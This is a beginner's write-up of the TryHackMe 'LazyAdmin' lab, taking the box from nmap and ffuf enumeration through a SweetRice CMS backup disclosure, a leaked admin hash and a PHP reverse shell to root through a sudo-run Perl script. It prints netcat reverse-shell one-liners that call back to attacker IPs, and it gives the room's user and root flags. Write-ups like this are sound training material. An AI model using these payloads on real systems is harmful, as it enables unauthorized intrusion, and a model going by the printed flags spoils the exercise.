ImperialX1104/LazyAdmin-Writeup

# LazyAdmin-Writeup Beginner-friendly TryHackMe LazyAdmin writeup covering enumeration, web exploitation, credential discovery, and privilege escalation. # TryHackMe - LazyAdmin Writeup ## Room Information | Category | Details | | -------------- | ----------------------------------------------------------------------------------------- | | Platform | TryHackMe | | Room Name | LazyAdmin | | Difficulty | Easy | | Skills Learned | Enumeration, Web Exploitation, Credential Discovery, Reverse Shells, Privilege Escalation | # Introduction In this writeup, I solved the **LazyAdmin** room on TryHackMe. The objective of this room was to: * Perform reconnaissance * Enumerate services * Discover vulnerabilities * Gain initial access * Escalate privileges to root This room demonstrates how exposed backups, insecure CMS configurations, and weak privilege separation can lead to full system compromise. # Reconnaissance ## Verifying Connectivity Before starting enumeration, I verified that the target machine was reachable. ping 10.48.149.136 The target responded successfully. ### Screenshot  # Nmap Enumeration ## Aggressive Scan I performed an aggressive Nmap scan to identify open ports, running services, versions, and operating system details. nmap -A -v -T4 10.48.149.136 ## Scan Explanation | Flag | Purpose | | ----- | -------------------------------------------------------------------- | | `-A` | Enables OS detection, service detection, NSE scripts, and traceroute | | `-v` | Verbose output | | `-T4` | Faster scan timing | ## Scan Results | Port | Service | Version | | ---- | ------- | -------------------- | | 22 | SSH | OpenSSH 7.2p2 Ubuntu | | 80 | HTTP | Apache 2.4.18 Ubuntu | ### Key Findings * Ubuntu Linux target * Apache web server * SSH service enabled * Potential hidden web application ### Screenshot  # Web Enumeration ## Accessing the Website Navigating to the target IP displayed the default Apache page. ### Observation The default page indicated: * Apache was correctly configured * No direct application was visible * Hidden directories likely existed ### Screenshot  # Directory Enumeration ## Initial FFUF Scan I used FFUF to brute-force hidden directories. ffuf -u http://10.48.149.136/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt ## Results A hidden directory named `content` was discovered. ### Screenshot  # Discovering SweetRice CMS Navigating to: http://10.48.149.136/content/ revealed the target was running **SweetRice CMS**. ### Key Findings * SweetRice CMS identified * Site under construction * Administrative references visible * Potentially vulnerable CMS version ### Screenshot  # Vulnerability Research ## Searching for Public Exploits I searched for publicly available exploits related to SweetRice CMS. searchsploit SweetRice ### Interesting Result SweetRice 1.5.1 - Backup Disclosure This vulnerability suggested that backup files could be publicly accessible. ### Screenshot  # Additional Enumeration ## Enumerating `/content` I performed another FFUF scan against the `/content` directory. ffuf -u http://10.48.149.136/content/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt ## Interesting Directories | Directory | Description | | ------------ | -------------------------- | | `inc` | Included application files | | `as` | Admin panel | | `attachment` | Uploaded files | | `_themes` | Themes | | `js` | JavaScript resources | | `images` | Image assets | ### Screenshot  # Exploit Analysis ## Reviewing Exploit-DB The Exploit-DB advisory explained that SweetRice 1.5.1 exposed backup files publicly. ### Vulnerable Path /content/inc/mysql_backup/ ### Screenshot  # Exploiting Backup Disclosure ## Accessing the Backup Directory Navigating to the vulnerable directory revealed a downloadable SQL backup file. /content/inc/mysql_backup/ ### Exposed Backup File mysql_bakup_20191129023059-1.5.1.sql ### Screenshot  # Inspecting the SQL Backup ## Reviewing Database Contents The SQL dump was inspected locally. cat mysql_bakup_20191129023059-1.5.1.sql ## Extracting Credentials While reviewing the SQL dump, administrator credentials were discovered. ### Credentials Username: manager Hash: 42f749ade7f9e195bf475f37a44cafcb The administrator username and MD5 password hash were successfully identified. ### Screenshot  # Administrative Access ## Accessing the Admin Panel Using the recovered credentials, I authenticated to the SweetRice administrative dashboard. ### Admin URL http://10.48.149.136/content/as/ Administrative access was successfully achieved. ### Screenshot  # Remote Code Execution ## Preparing the Netcat Listener Before triggering the reverse shell payload, I started a Netcat listener. nc -lvnp 5555 ## Reverse Shell Connection After uploading and executing the PHP reverse shell payload through the SweetRice CMS, the target connected back successfully. ### Reverse Shell Information uid=33(www-data) gid=33(www-data) groups=33(www-data) The shell was obtained as the `www-data` user. ### Screenshot  # User Enumeration ## Exploring the Filesystem After gaining shell access, I enumerated the filesystem. cd /home ls The user `itguy` was discovered. ### Listing User Files cd itguy ls Interesting files: * `backup.pl` * `mysql_login.txt` * `user.txt` # Capturing the User Flag ## Reading the User Flag cat user.txt ### User Flag THM{63e5bce9271952aad1113b6f1ac28a07} ### Screenshot  # Privilege Escalation ## Checking Sudo Permissions I checked the sudo permissions available to the `www-data` user. sudo -l ### Sudo Output (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl This indicated that the Perl script could be executed as root without a password. ### Screenshot  # Inspecting the Vulnerable Perl Script ## Reviewing `backup.pl` cat /home/itguy/backup.pl ### Script Contents #!/usr/bin/perl system("sh", "/etc/copy.sh"); The script executed `/etc/copy.sh` with elevated privileges. # Inspecting `copy.sh` ## Reviewing the Payload cd /etc cat copy.sh ### Existing Payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f The reverse shell payload needed to be modified to connect back to my attacking machine. # Modifying the Reverse Shell Payload Because the reverse shell lacked a proper TTY, editors such as `nano` failed. Instead, I overwrote the file using `echo`. echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.204.24 6666 > /tmp/f' > /etc/copy.sh # Starting the Root Listener On my Kali machine, I started another Netcat listener. nc -lvnp 6666 # Executing the Perl Script I executed the vulnerable Perl script using sudo. sudo /usr/bin/perl /home/itguy/backup.pl This triggered the reverse shell payload as root. # Root Shell Obtained The target connected back successfully. ### Verifying Root Access whoami ### Output root # Capturing the Root Flag ## Navigating to Root Directory cd /root ls The `root.txt` file was discovered. ## Reading the Root Flag cat root.txt ### Root Flag THM{6637f41d0177b6f37cb20d775124699f} ### Screenshot  # Flags Captured | Flag | Value | | --------- | --------------------------------------- | | User Flag | `THM{63e5bce9271952aad1113b6f1ac28a07}` | | Root Flag | `THM{6637f41d0177b6f37cb20d775124699f}` | # Conclusion The LazyAdmin room demonstrated several critical real-world security issues: * Publicly exposed backup files * Weak password storage mechanisms * Vulnerable CMS deployment * Unsafe sudo configurations * Insecure script execution By chaining these vulnerabilities together, full system compromise was achieved from initial web enumeration to root access. # Tools Used * Nmap * FFUF * Searchsploit * Netcat * Kali Linux * Exploit-DB * Perl # Disclaimer This writeup was created strictly for educational purposes on the TryHackMe platform. Do not attempt these techniques on systems without explicit authorization.